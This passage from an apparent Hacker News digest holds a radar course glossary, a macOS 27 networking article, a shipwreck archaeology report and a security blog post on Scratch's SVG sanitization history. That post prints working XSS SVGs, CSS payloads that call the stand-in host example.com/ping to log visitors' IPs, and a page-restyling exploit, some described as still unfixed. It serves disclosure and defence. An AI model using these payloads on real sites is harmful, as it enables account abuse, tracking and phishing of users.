The maximum target range at which the radar can correctly identify the echo as belonging to the most recent pulse. Beyond R\_u, the echo arrives after the next pulse has been transmitted and is incorrectly attributed to that later pulse, causing the radar to report a "folded" shorter range. R\_u is set by the PRF: R\_u = c/(2·PRF). Increasing PRF extends Doppler coverage but shrinks R\_u.

R\_u = c / (2·PRF)

Unambiguous Velocity v\_u

The maximum radial velocity the radar can unambiguously measure. Beyond v\_u, the target's Doppler phase advance per PRI exceeds π radians (the Nyquist limit), causing the velocity to alias to an incorrect lower value or wrong direction. v\_u is set by the PRF and wavelength: v\_u = PRF·λ/4. Decreasing PRF (to extend range) shrinks v\_u.

v\_u = PRF · λ / 4

W

Window Function Taper, Weighting

An amplitude weighting applied to an array aperture (spatial window) or pulse bandwidth (spectral window) to reduce sidelobes at the cost of slightly widened main lobe. Common windows: Rectangular (no taper — highest sidelobes −13.2 dB, narrowest main lobe), Hamming (−42.7 dB sidelobes, 1.46× wider main lobe), Taylor (adjustable −25 to −50 dB sidelobes), Chebyshev (equiripple — minimum main lobe width for given sidelobe level). Used in both antenna pattern shaping and range/Doppler processing.

ABOUT RADAR LABORATORY

A VISUAL COURSE FOR BUILDING PRACTICAL RADAR INTUITION

PURPOSE

**Radar Laboratory is an interactive learning environment for engineers who need to understand radar behavior without treating the sensor as a black box.**

Each module pairs a visual scene with a plot, live readouts, and a short explanation. The goal is to make the physical behavior visible first, then connect that behavior to the equations.

The material is written for new engineers, systems engineers, analysts, and software developers who work around radar systems but may not have formal RF or electrical-engineering training.

LEARNING PATH

The course starts with the measurements radar makes directly, then builds toward performance limits, detection, digital processing, and advanced phenomenology.

- **Measurement foundations:** electromagnetic waves, range timing, PRF, range resolution, Doppler, and ambiguity.
- **Waveforms, targets, and aperture:** pulse energy, matched filtering, RCS, antenna gain, arrays, beamwidth, and scanning.
- **Performance and propagation:** noise, SNR, coherent integration, the radar range equation, free-space loss, atmospheric loss, multipath, horizon, and clutter.
- **Detection:** thresholding, clutter-limited detection, and CFAR.
- **Digital processing:** IQ data, Fourier transforms, fast/slow time, range bins, Doppler spectra, and range-Doppler maps.
- **Advanced phenomenology:** trajectories, scatterers, ISAR, MTI, STAP, and electronic attack.

ACCURACY AND SCOPE

The simulations use standard radar relationships and simplified engineering models. They are intended for training, communication, and first-order intuition.

Radar Laboratory is not a replacement for a validated radar performance model, mission-analysis tool, hardware test, or scenario-specific simulation. When a module uses a simplification, the module text states the main assumption and keeps the core physical relationship intact.

HOW TO USE IT

- Start with the scene and identify what is physically happening.
- Move one control at a time.
- Watch the plot and readouts change.
- Use the checkpoint to confirm the takeaway.
- Use the theory page when you want the equation in context.

REFERENCE BASIS

The content follows standard radar, antenna, detection, propagation, and DSP references, including Skolnik, Richards, Levanon & Mozeson, Balanis, Van Trees, Nathanson, Ward, Kay, Oppenheim & Schafer, Stimson, and ITU-R recommendations P.676, P.838, and P.530.

Equations are used to support intuition. Engineering decisions should still be checked against authoritative references and validated models.

TECHNOLOGY

Radar Laboratory is a single-file HTML application using HTML5 Canvas, CSS, and vanilla JavaScript. It can be hosted as a static site or opened locally for demonstration and training.

HTML5 CANVAS VANILLA JS SINGLE FILE STATIC SITE READY

---

## [HN-TITLE] 16. Networking changes coming in macOS 27

- **Source**: [https://eclecticlight.co/2026/04/23/networking-changes-coming-in-macos-27/](https://eclecticlight.co/2026/04/23/networking-changes-coming-in-macos-27/)
- **Site**: The Eclectic Light Company
- **Submitter**: pvtmert (Hacker News)
- **Published**: 2026-04-23
- **HN activity**: 211 points · [185 comments](https://news.ycombinator.com/item?id=47923010)
- **Length**: 584 words (~3 min read)
- **Language**: en

Apple seldom gives advanced notice of significant changes coming in the next major version of macOS, before its first beta-release at WWDC. One significant exception to this are changes to networking that could impact enterprise users. This year, with just over six weeks to go before that first beta of macOS 27, we already have two warnings of what might be coming.

#### AFP and network storage

Apple made SMB its primary file-sharing protocol in OS X 10.9 Mavericks, over 12 years ago, and has repeatedly told us that support for its predecessor AFP will be removed in the future. It repeated those warnings with macOS Sequoia 15.5, but still hasn’t confirmed when AFP will be lost.

Those who are most likely to be affected by this are still using Time Capsules, or elderly NAS systems that don’t support SMB3. As removal of AFP support won’t be retrospective, provided that none of your Macs will be upgraded to macOS 27, you’ll still be able to use AFP for your file shares and Time Machine backups. But if you have an Apple silicon Mac and AFP support is dropped from macOS 27, that would leave you unable to upgrade without replacing your network storage.

#### TLS and servers

Most recently, Apple [has warned](https://support.apple.com/126655) that a future version of macOS, and its device OSes, will require connections to certain servers to be made using at least TLS 1.2, with additional requirements. I’m grateful to Rich Trouton’s [Der Flounder blog](https://derflounder.wordpress.com/2026/04/21/apple-enforcing-stricter-network-security-requirements-for-future-versions-of-apples-platform-operating-systems/) for drawing attention to this.

Although Apple carefully avoids being too specific, it warns that this change could come “as early as the next major software release”, although one of the purposes behind its support article is to gauge the impact the change might have on its enterprise customers. If there would be major problems, it may decide to delay its introduction.

This change is more technical, and largely applies to servers involved in supporting MDM, DDM, Automated Device Enrolment, app distribution and installation, and Apple software updates. Fortunately, if you run a local Content Caching server, that *won’t* be affected.

Unlike the removal of AFP, it’s far harder to tell whether a connection to a server complies with the new rules, which require:

- support for TLS 1.2 or later, with TLS 1.3 recommended,
- use of ATS-compliant ciphersuites,
- presentation of valid certificates meeting ATS standards.

The most reliable way to check is to audit connections made to each server, by screening log entries from the Mac or device. That’s further complicated by the fact that the log doesn’t normally gather the information that’s required. So the first step is to install a network diagnostics logging profile available from Apple. The [support article](https://support.apple.com/126655) explains how to collect a logarchive using `sysdiagnose`, and provides a monster predicate to extract relevant entries:  
`"p=appstoreagent|appstored|managedappdistributionagent|managedappdistributiond|ManagedClient|ManagedClientAgent| mdmclient|mdmd|mdmuserd|MuseBuddyApp|NanoSettings|Preferences|profiled|profiles|RemoteManagementAgent| remotemanagementd|Setup|'Setup Assistant'|'System Settings'|teslad|TVSettings|TVSetup|XPCAcmeService AND s=com.apple.network AND m:'ATS Violation'|'ATS FCPv2.1 violation'"`

And yes, Apple is encouraging system administrators to copy and paste a command into Terminal, because there’s no GUI app in macOS that could be used to do that, although you can use it in Ulbow, and I suspect in LogUI with a little modification.

If you’re within the scope of this proposed change, you’ll need to read [Rich Trouton’s account](https://derflounder.wordpress.com/2026/04/21/apple-enforcing-stricter-network-security-requirements-for-future-versions-of-apples-platform-operating-systems/), and Apple’s [full article](https://support.apple.com/126655). I wish you the best of luck. As with AFP, this change shouldn’t apply retrospectively.

#### Timescale

- 27.0 developer beta due on 8 June 2026
- 27.0 public beta due around 8 July 2026
- 27.0 release most probably in mid-September 2026, only five months away.

---

## [HN-TITLE] 17. Spanish archaeologists discover trove of ancient shipwrecks in Bay of Gibraltar

- **Source**: [https://www.theguardian.com/science/2026/apr/15/hidden-treasures-spanish-archaeologists-discover-trove-of-ancient-shipwrecks-in-bay-of-gibraltar](https://www.theguardian.com/science/2026/apr/15/hidden-treasures-spanish-archaeologists-discover-trove-of-ancient-shipwrecks-in-bay-of-gibraltar)
- **Site**: The Guardian
- **Author**: Sam Jones
- **Published**: 2026-04-15
- **HN activity**: 83 points · [14 comments](https://news.ycombinator.com/item?id=47907175)
- **Length**: 1.0K words (~5 min read)
- **Language**: en

Spanish archaeologists exploring the bay that curves between the southern port of Algeciras and the Rock of Gibraltar have documented the wrecks of more than 30 ships that came to grief near the Pillars of Hercules between the fifth century BC and the second world war.

Over the millennia, the bay, which sits at the north end of the strait of Gibraltar that separates [Europe](https://www.theguardian.com/world/europe-news) from Africa, has swallowed everything from Phoenician and Roman vessels to British, Spanish, Venetian and Dutch ships – as well as the odd aeroplane.

A [three-year project](https://produccioncientifica.uca.es/documentos/69a09b7dbb968f5c160c69bf) led by the University of Cádiz has now identified 151 archaeological sites in the bay, among them 134 shipwrecks. To date, the researchers and their colleagues from the University of Granada have worked to document 34 of those wrecks.

![A pair of team members uses a suction hose to clean sediment from a wreck in the bay of Algeciras](https://i.guim.co.uk/img/media/e6061b1b8fb08d4492a358f75035d4a4727ebe7d/0_0_1600_1200/master/1600.jpg?width=445&dpr=1&s=none&crop=none)

A pair of team members uses a suction hose to clean sediment from a wreck in the Bay of Algeciras. Photograph: Felipe Cerezo Andreo

The oldest is that of a Punic era ship dating to the fifth century BC, while other finds include 23 Roman ships, two late Roman ships, four medieval ships and 24 vessels from the early modern period.

Between them, the sunken items – which include an agile and fearsome 18th-century Spanish gunboat and the engine and propeller of a plane from the 1930s – tell the story of war, trade, exploration and settlement in and around one of the most strategically important waterways in the world.

Felipe Cerezo Andreo, a professor of archaeology at the University of Cádiz who led the investigation, which is called Project Herakles, said that area has long been a watery crossroads.

“It’s one of those bottlenecks through which ships have always had to pass, whether on commercial shipping routes, voyages of discovery, or due to armed conflicts,” he said.

![An outlined wreck is seen from above a few metres offshore in the Bay of Algeciras](https://i.guim.co.uk/img/media/46657dd0fbcf633f91f828470c74342a8d06da64/0_0_4000_2250/master/4000.jpg?width=445&dpr=1&s=none&crop=none)

An outlined wreck is seen from above a few metres offshore in the Bay of Algeciras. Photograph: Alejandro Mañas

“There are really few places in the Mediterranean that have this kind of concentration and such a significant variety of archaeological remains, especially in terms of different cultures or different nations. We have Dutch, Venetian, Spanish, and of course English ships – ships of practically every nationality – because they all passed through the strait, whether heading out to the Atlantic for trade, or entering the Mediterranean from northern Europe or other regions.”

Cerezo said the researchers were particularly excited to have documented three medieval vessels that could shed light on seafaring during the late period of Islamic rule in southern [Spain](https://www.theguardian.com/world/spain).

Although the team has come across large ships from the 16th and 17th centuries, one of the most exciting finds has been the wreck of the Puente Mayorga IV, a small, late 18th-century gunboat of a type used for rapid, stealthy attacks on British ships of the line around Gibraltar. The attack craft would often disguise themselves as fishing boats before flinging off their netting and firing their prow-mounted cannon at their enemies.

![A book-shaped box that was found in the wreck of the 18th century Spanish gunboat Puente Mayorga IV](https://i.guim.co.uk/img/media/aeeac04a669965bd9fd37cbe8831182cd67a0fca/0_0_4608_3456/master/4608.jpg?width=445&dpr=1&s=none&crop=none)

A book-shaped box that was found in the wreck of the 18th-century Spanish gunboat Puente Mayorga IV. Photograph: Felipe Cerezo Andreo

Despite being frequently mentioned in contemporary reports, such boats have been little studied by archaeologists.

Cerezo himself was delighted to come across one of the Puente Mayorga IV’s less obvious treasures during an excavation. What he initially took to be a miraculously preserved book turned out to be a book-shaped wooden box with a hollow space inside.

“At first, we thought it could be used to hide documents, and we thought it might have something to do with espionage,” said the archeologist. “Was the officer who carried it mapping the position of an enemy vessel?” Sadly not. After careful examination, the box turned out to contain a pair of wooden combs, suggesting the officer may have been more preoccupied with grooming than spying.

Cerezo and his colleagues hope the Andalucían regional government and Spain’s culture ministry will act to preserve and protect the sites in the Bay of Algeciras – known to English-speakers as the Bay of Gibraltar – which are at risk from port development, dredging and dock construction. The climate emergency is already proving a threat, bringing both rising sea levels that are [altering sediment layers and exposing archaeological sites](https://www.marinebiodiversity.ca/rising-seas-are-washing-away-ancient-underwater-treasures-heres-what-scientists-are-doing/#google_vignette), and [an invasive algae that grows over rocks and wrecks alike](https://www.ceab.csic.es/en/lalga-asiatica-rugulopteryx-okamurae-detectada-al-litoral-de-barcelona/).

![A member of the Herakles Project team examines a wreck in the Bay of Algeciras](https://i.guim.co.uk/img/media/fdb9741aea7be6cdae795ad2d057a1028b2548df/0_0_5568_4176/master/5568.jpg?width=445&dpr=1&s=none&crop=none)

A member of the Herakles Project team examines a wreck in the Bay of Algeciras. Photograph: Herakles Project/Supplied

In order to share their finds and raise awareness of the importance of preserving them, the researchers have made virtual models and 360-degree videos of the sites, which they share with the public online and in local museums and town halls.

“We bring these goggles so that people who don’t dive can put them on and have a dryland diving experience,” said Cerezo. “Although people sometimes imagine they’re going to see [a wrecked treasure ship like the Unicorn in Tintin](https://www.tintin.com/en/albums/red-rackham-s-treasure), the sites tend not to be that well preserved. The state of them can sometimes be a bit disappointing, but it’s important that people know what’s going on. And showing this to people creates a demand for the protection of these sites.”

[map of the Bay of Gibraltar](https://interactive.guim.co.uk/uploader/embed/2026/04/algecirasbay-zip/giv-32554pl2OCOGZ7luo/)

The waters of the bay offer an unparalleled microcosm of thousands of years of maritime and cultural development, said Cerezo.

“What we have here is a very small space that allows us to analyse the evolution of maritime history throughout practically the whole of the Iberian peninsula and north Africa.

“It tells us a story that we sometimes forget, which is that maritime societies, or peoples who have lived in coastal areas, have had a very intense relationship with the sea and have lived on the sea. And being able to study these kinds of archaeological remains – to document them, to learn about them in situ and not just through the objects that sometimes end up in a museum, but to understand them in their context – allows us to carry out that process of reconstruction and to tell the story of these people.”

---

## [HN-TITLE] 18. The woes of sanitizing SVGs

- **Source**: [https://muffin.ink/blog/scratch-svg-sanitization/](https://muffin.ink/blog/scratch-svg-sanitization/)
- **Site**: muffin.ink
- **Submitter**: varun\_ch (Hacker News)
- **Submitted**: 2026-04-27 15:31 UTC (Hacker News)
- **HN activity**: 190 points · [76 comments](https://news.ycombinator.com/item?id=47922957)
- **Length**: 2.9K words (~13 min read)
- **Language**: en

Scratch has a long history of SVG-related vulnerabilities. The source of these is that Scratch parses user-generated (ie. attacker-controlled) content into an `<svg>` element and appends it into the main document for various operations (eg. measuring SVG bounding box in a more reliable way than viewbox or width/height).

No matter how briefly the SVG remains in the main document, this is an inherently unsafe operation. Scratch's approach to making this safe has been to build increasingly complex infrastructure around parsing the SVG and the markup within to remove dangerous parts.

I think Scratch's approach to SVG sanitization is doomed. To explain, we have to take a trip through the history of SVG sanitization in Scratch to see how well it has worked so far.

## 2019: XSS via &lt;script&gt; tag

In 2019, a few months after the initial release of Scratch 3, Scratch discovered that SVGs can contain `<script>` tags that Scratch would cause to be executed when the SVG loads. This is known as an XSS.

In Scratch terms, an XSS allows an attacker to take actions on behalf of anyone that loads their project. For example, the attacker can post comments, delete projects, or otherwise try to take over the victim's account. In Scratch Desktop, XSS is elevated to arbitrary code execution because Scratch Desktop enables Electron's dangerous [Node.js integration](https://muffin.ink/blog/bananatron#node-js-integration) feature. (TurboWarp Desktop has not enabled that feature since v0.2.0 from March 2021)

Example from Scratch's test suite:

```
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
  "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
  <circle cx="250" cy="250" r="50" fill="red" />
  <script type="text/javascript"><![CDATA[
      alert('from the svg!')
  ]]></script>
</svg>
```

This [was fixed](https://github.com/scratchfoundation/scratch-svg-renderer/commit/78cc7ea22887cdb2d3e3a00b23557a37251632f8) by using a regular expression to remove script tags.

Surely, with this change, SVGs are now fully safe and will require no further security fixes.

## 2020: XSS via oversights in previous fix (CVE-2020-7750)

In 2020, [apple502j discovered](https://scratch.mit.edu/discuss/topic/449794/) that XSS is still possible. It turns out that the previous fix is utterly defective and can be bypassed by capitalizing `<SCRIPT>` because the regex is case-sensitive, among several other ways to bypass it. Even if the regex were implemented correctly, it would still not work because there are other ways to embed JavaScript in an SVG. For example, one can use an inline event handler:

```
<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
    <foreignObject x="1" y="1" width="1" height="1">
        <img
            xmlns="http://www.w3.org/1999/xhtml"
            src="data:any invalid URL"
            onerror="alert(1)"
        />
    </foreignObject>
</svg>
```

This [was fixed](https://github.com/scratchfoundation/scratch-svg-renderer/commit/9ebf57588aa596c4fa3bb64209e10ade395aee90) by using [DOMPurify](https://github.com/cure53/dompurify) to remove scripts from the SVG before `scratch-svg-renderer` appends it into the document.

Surely, with this change, SVGs are now fully safe and will require no further security fixes.

## 2022: HTTP leak via &lt;image&gt; href

In 2022, it was discovered that using the `href` property on an `<image>` element, an attacker can create an SVG that will invoke an external request when it is loaded. It turns out that while DOMPurify removes executable code, it [does not protect against HTTP leaks](https://github.com/cure53/DOMPurify/wiki/Security-Goals-&-Threat-Model#non-goals) because "there are too many ways of doing that and our tests showed that it cannot be done reliably".

In Scratch terms, an HTTP leak means that a Scratch user can log the IP of anyone that loads their project, possibly revealing information such as location or school district. The victim would not need to click on any links; the IP log happens just by loading the project. Scratch seems to consider this a security bug, and I agree.

Example:

```
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="https://example.com/ping"/>
</svg>
```

This [was fixed](https://github.com/scratchfoundation/scratch-editor/commit/8bcef3bd7d1c80fd6afc8ada273e8346a802ccf1) by adding DOMPurify hooks to remove `href` properties from all elements if the URL refers to a remote website.

Surely, with this change, SVGs are now fully safe and will require no further security fixes.

## 2023: HTTP leak via CSS @import

In 2023, it was discovered that using a CSS `@import` statement inside of a `<style>` element, an attacker could create a project that invokes external requests when the project loads. Example:

```
<svg xmlns="http://www.w3.org/2000/svg">
  <style>
    @import url("https://example.com/ping");
  </style>
</svg>
```

This [was fixed](https://github.com/scratchfoundation/scratch-svg-renderer/commit/a3ba9eb15036b6983a6b7713d0f1d5114e00329f) by integrating a CSS parser written in JavaScript to remove dangerous parts of the CSS. They would parse all stylesheets contained in SVGs, remove any `@import` statements, and convert the CSS back to a string if any changes were made so that the dangerous stuff is removed.

Surely, with this change, SVGs are now fully safe and will require no further security fixes.

## 2024: XSS via Paper.js

In 2024, I discovered [an XSS](https://muffin.ink/blog/paperjs-xss) in [Paper.js](https://github.com/paperjs/paper.js), a library Scratch uses in the costume editor. It turns out that while Scratch sanitized SVGs before working on them in scratch-svg-renderer, unsanitized SVGs were still being passed to Paper.js. This has largely the same impact as the 2020 scratch-svg-renderer XSS, but occurs when using the costume editor instead of when initially opening a project. Example:

```
<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" data-paper-data="any invalid JSON">
    <foreignObject x="1" y="1" width="1" height="1">
        <img
            xmlns="http://www.w3.org/1999/xhtml"
            src="data:any invalid URL"
            onerror="alert(1)"
        />
    </foreignObject>
</svg>
```

This [was somewhat fixed](https://github.com/scratchfoundation/scratch-editor/pull/251) on an extremely delayed timeline by extending the existing SVG sanitization code to run when loading an SVG, not just when processing it in scratch-svg-renderer. This means that Paper.js will only receive SVGs that have already been sanitized.

I say "somewhat fixed" because I'm not sure if that sanitization ever runs for server-downloaded SVGs. Scratch support told me they "have protections against this that are handled on our server side" which may make that redundant. I have never seen any evidence of such protections while developing proof-of-concepts, but maybe they are real.

Surely, with this change, SVGs are now fully safe and will require no further security fixes.

## 2025: HTTP leak via CSS url()

In 2025, it was discovered that using `url()` inside of certain CSS rules, an attacker can create an SVG that will invoke an external request when it is loaded. Examples:

```
<svg xmlns="http://www.w3.org/2000/svg">
    <!-- inline style -->
    <rect style="background-image: url(https://example.com/ping)" />

    <!-- can also use a <style> element -->
    <style>
        .img {
            background-image: url("https://example.com/ping");
        }
    </style>
    <rect class="img" />
</svg>
```

This [was fixed](https://github.com/scratchfoundation/scratch-editor/commit/2756ebd4275987e2f99791ae6123daea1fb28ce7) by substantially expanding the SVG sanitization code to also search for any usage of `url()` and remove any styles or attributes referencing external URLs.

Surely, with this change, SVGs are now fully safe and will require no further security fixes.

## 2026: HTTP leak via several bugs in the previous code

In 2026, it was discovered that using `url()` inside of certain CSS rules, it is still possible for an attacker to create an SVG that will invoke an external request when it is loaded. It turns out there were at least three unique bugs that each allowed an HTTP leak:

- Did not account for CSS allowing one to write out `url(...)` using escape codes
- Did not handle a `style` attribute having more than one `url(...)` inside it, where the first one is safe but the second one is not
- Did not handle `url()` defined in a CSS variable and referenced via `var(--name)`

Examples:

```
<svg xmlns="http://www.w3.org/2000/svg">
    <circle fill="\75\72\6c(https://example.com/ping)" />
    <rect style="/* url(#safe_url) */ background-image: url(https://example.com/ping)" />
    <style>
        :root {
            --example: url(https://example.com/ping);
        }
        .img {
            background-image: var(--example);
        }
    </style>
    <rect class="img" />
</svg>
```

This [was fixed](https://github.com/scratchfoundation/scratch-editor/commit/fbea3d199278c19f88023cdd48c83d6edd7cf81d) [by adding](https://github.com/scratchfoundation/scratch-editor/commit/6d20ec339f24367502bd326bb7580ddd6bcffe23) [a substantial amount](https://github.com/scratchfoundation/scratch-editor/commit/2570c393f8ca4e47ea6a905bbc0fa3f4db90e4df) [of additional complexity](https://github.com/scratchfoundation/scratch-editor/commit/b850a15d871adb67e150c89bd8c1a36fdc044251) [around code that](https://github.com/scratchfoundation/scratch-editor/commit/9442435c68699dd7af30aae23b9f725f627fb4a1) was already way too complex.

Surely, with this change, SVGs are now fully safe and will require no further security fixes.

## 2026: Full page restyling via long transitions

In 2026, it was discovered that through clever use of very long transitions and forcing the browser to restyle all elements, an attacker can apply arbitrary styles to the full Scratch page that last until refresh. Most uses of this have been "fun" things, but here's a few ideas about more evil things you might be able to do:

- Hiding the report button.
- Making the like/favorite buttons cover the entire page, so that users are tricked into clicking them.
- Display text telling the user that they need to open a website in a new tab to "verify" their account (some phishing page). Users are likely to trust the instructions because the message is coming from the real scratch.mit.edu.

Example project (not mine): [https://scratch.mit.edu/projects/1299571218/](https://scratch.mit.edu/projects/1299571218/)

This will probably get fixed at some point, but today what you'll see is this:

![Scratch project page, but all the page background colors are very obviously wrong.](https://muffin.ink/blog/scratch-svg-sanitization/blue.png)

This project uses two SVGs. The first one is the "trigger":

```
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="100">
  <rect x="0" y="0" width="200" height="100" fill="#111"></rect>
  <text x="100" y="55" fill="#0f0" font-size="12" text-anchor="middle">
    Trigger
  </text>

  <style>
    /* Force browser to recalc styles to activate first SVG */
    *, * *, * * *, * * * * {
      transform: translateX(1px) scale(10000) rotateY(45deg) perspective(1cm) !important;
      transition: all 9999s ease !important;
      filter: blur(0px) !important;
    }
  </style>
</svg>
```

The second one contains the styles to display:

```
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="100">
  <rect x="0" y="0" width="200" height="100" fill="#111"></rect>
  <text x="100" y="55" fill="#0f0" font-size="12" text-anchor="middle">
    Styles
  </text>

  <style>
    /* Global background blue */
    * {
      background-color: blue !important;
      color: white !important;
    }

    /* Project instructions/description styling */
    .project-description, .instructions-container {
      background-color: yellow !important;
      color: black !important;
      border: 10px solid red !important;
      transform: scale(1.1) !important;
    }
  </style>
</svg>
```

I won't pretend to fully understand what's going on here or why it works non-deterministically, but my general understanding is:

- The trigger SVG applies `transform` and `filter` to every element in the document to forcibly make the browser recompute all styles right away, applying styles from the other SVG.
- The trigger SVG applies a very long `transition` so that when the other SVG is removed, the styles will stick around for the duration of the "transition"

This is not fixed.

Surely, if this were fixed, SVGs would be fully safe and would require no further security fixes.

## 2026: HTTP leak via image-set()

I reported this one to Scratch in 2025. They didn't fix it, so whatever, I'll disclose it here. Any reasonable disclosure period lapsed 6 months ago.

Instead of using `url()`, an attacker can use `image-set()` to create an SVG that will invoke an external request when it is loaded. Examples:

```
<svg xmlns="http://www.w3.org/2000/svg">
    <!--
        image-set(...) can cause external resources to be requested without using url() at all.
    -->
    <style>
        .image-set-with-string-url {
            background-image: image-set("https://example.com/ping" 1x);
        }
    </style>
    <rect class="image-set-with-string-url" />

    <!--
        image-set(url(...)) works the same as image-set(...).
        This already gets blocked by the existing sanitization.
    -->
    <style>
        .image-set-with-inner-url-function {
            background-image: image-set(url(https://example.com/ping) 1x);
        }
    </style>
    <rect class="image-set-with-inner-url-function"></rect>

    <!--
        image-set() can also be used in inline style attributes.
    -->
    <rect style="background-image: image-set('https://example.com/ping' 1x)" />
</svg>
```

This is not fixed.

Surely, if this were fixed, SVGs would be fully safe and would require no further security fixes.

## 20XX: HTTP leak via new CSS features

I also reported this one to Scratch in 2025. This bug actually doesn't work today, but will in the future if browsers ever implement all of [CSS Units Level 4](https://www.w3.org/TR/css-values-4/) or [CSS Images Level 4](https://drafts.csswg.org/css-images-4/). Today, [Ladybird](https://ladybird.org/) is the only browser to implement either of these, but major browsers could implement them someday as well.

Instead of using `url()`, an attacker can use [`src()`](https://www.w3.org/TR/css-values-4/#example-a2ee15a6) or [`image()`](https://drafts.csswg.org/css-images-4/#funcdef-image) to create an SVG that will invoke an external request when it is loaded. Examples:

```
<svg xmlns="http://www.w3.org/2000/svg">
    <!--
        Everything in this file relies on features that are defined in the browser specs, but not yet implemented in any browser.
        In theory, future browsers might initiate requests when they see these styles.
    -->

    <!--
        CSS Units Level 4 defines src(...) as an alternative to url(...).
        Unlike url(), src()'s URL can be any expression, not just a constant string.
        Reference: https://www.w3.org/TR/css-values-4/#example-a2ee15a6
        Not implemented by any major browser today. (Only implemented in the experimental Ladybird browser)
    -->
    <style>
        .src-constant {
            background: src('https://example.com/ping');
        }
        .src-variable {
            --url: 'https://example.com/ping';
            background: src(var(--url));
        }
    </style>
    <rect class="src-constant" />
    <rect class="src-variable" />

    <!--
        CSS Images Level 4 defines image() as an alternative to url() for images.
        Reference: https://www.w3.org/TR/css-images-4/#image-notation
        Not implemented by any major browser today.
    -->
    <style>
        .image {
            background: image('https://example.com/ping', black);
        }
    </style>
    <rect class="image" />

    <!-- Same as above examples, but using inline styles -->
    <rect style="background: src('https://example.com/ping');" />
    <rect style="--url: 'https://example.com/ping'; background: src(var(--url));" />
    <rect style="background: image('https://example.com/ping', black);" />
</svg>
```

This is not fixed.

Surely, if this were fixed, SVGs would be fully safe and would require no further security fixes.

## This is unsustainable

Stacking more and more complexity into sanitization is clearly a doomed approach. We are more than 5 major revisions deep and yet there are still known holes. People are actively sharing projects on the Scratch website bypassing SVG sanitization. And the moment browsers decide to implement the latest CSS specs, even more holes will open up.

Furthermore, not all of these problems have clear solutions. For full page styling, both SVGs seem completely benign: there is no JavaScript or references to external resources. The fix would likely be to remove `transition` styles since the transitions would never run in Scratch anyway, but are you sure that's sufficient? Will you remember to also remove all the vendor-prefixed versions of `transition`? What about `animation` styles?

Some other possible cases that might allow more bypasses in the future:

- `css-tree` (the library Scratch uses to parse CSS) and the real CSS parsers in browsers might not completely match. If so, `css-tree` might parse CSS such that everything looks fine and thus nothing gets removed, but then the browser's real parser does recognize external content.
- Advanced new CSS features such [`@property`](https://developer.mozilla.org/en-US/docs/Web/CSS/Reference/At-rules/@property) or [native nesting](https://developer.mozilla.org/en-US/docs/Web/CSS/Guides/Nesting/Using) that `css-tree` versions might not be able to meaningfully parse without constant updates.
- Browsers can always add new functions that can reference external content as they have already done with `image-set()` and the spec implies will happen for `src()` and `image()`. How will you keep up with the constant change in these specs to evaluate every new function and see if it could somehow allow referencing external content?

## An alternative

TurboWarp (a Scratch fork I work on) was unaffected by the 2026 HTTP leaks and full page restyling issue. This isn't because I found all the clever ways for an SVG to do something bad; in fact I [actually deleted](https://github.com/TurboWarp/scratch-svg-renderer/commit/ccc8890d808fd9116d0f93e7d76649b6dc6525e7) the CSS sanitization code entirely to make packaged projects 400KB smaller.

I implemented an alternative approach of sandboxing the SVG inside of an iframe. First, we set up an iframe with a `sandbox` property of `allow-same-origin`. This will block script execution inside the iframe, but still let us interact with the contents inside.

Second, we set up the iframe with the following hardcoded HTML:

```
<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
        <meta http-equiv="Content-Security-Policy" content="default-src 'none'; style-src 'unsafe-inline' data:; font-src data:; img-src data:">
    </head>
    <body></body>
</html>
```

The inline [Content-Security-Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CSP) is set up to block all scripts and only allow loading safe resources from safe data URLs. We also still use DOMPurify to remove obviously evil things from the SVG. We then put the iframe into the document offscreen somewhere so that the measurement APIs Scratch needs will still work.

This approach gives us some very nice properties:

- **The browser uses its pre-existing code to do the hard part for us.**
  
  TurboWarp doesn't need to know about all the ways for an SVG to make a request. Your browser already knows this and will enforce it for any new APIs that get added.
  
  Real-world CSP implementations are not perfect and have holes. However, those holes generally are weird edge cases that require the attacker to already be executing JavaScript in some way. Those vulnerabilities are also considered browser security issues so they have bug bounties attached to them.
- **The SVG can't affect the main document.**
  
  Consider the case of the full page restyling. Because the SVG is trapped inside of an iframe, the only thing it can restyle is the iframe. The styles in the iframe do not matter, so that's perfectly fine.

You can find our code here:

- [scratch-svg-renderer fork](https://github.com/TurboWarp/scratch-svg-renderer/commit/0611932d92755293155b63443a34addf08498ce1)
- [paper.js fork](https://github.com/TurboWarp/paper.js/commit/a3a4a8c2e276552dc12ad18a22c07d1a5d4af100)

Maybe you can do some other interesting stuff with shadow DOM or other web APIs, but we found that the iframe is working fine for us.

The below sections will cover any new issues I become aware of after publication.

## 2026-04-12: Claude finds HTTP leak via CSS nesting relaxed syntax

After publishing this, I was curious how well current language models are at finding these bugs. I told Claude Opus 4.6 to clone the [scratch-editor repo](https://github.com/scratchfoundation/scratch-editor/), look at the recent SVG renderer changes, and see if there were any holes. Results were interesting:

- Claude discovered on its own that `image-set(...)` is not sanitized and can cause HTTP leaks.
- **Claude discovered a new issue not described in the original version of this post.**

The bug involves CSS nesting, which can appear in two forms. The nested style can prefix the selector with an `&` or instead just not prefix it (the latter being known as "relaxed" syntax). Modern browsers interpret both of the below identically.

```
g {
    & rect {
        background-image: url(https://example.com/ping);
    }
}

g {
    rect {
        background-image: url(https://example.com/ping);
    }
}
```

`css-tree` is capable of parsing the `&`-prefixed version into a meaningful syntax tree that Scratch can sanitize. However, it turns out that `css-tree` does not know how to parse the relaxed version. The entire `div { ... }` block is parsed as a "raw text" node which Scratch's code will not sanitize. Full example SVG:

```
<svg xmlns="http://www.w3.org/2000/svg">
    <style>
        g { rect { background-image: url(https://example.com/ping); } }
    </style>
    <g><rect></rect></g>
</svg>
```

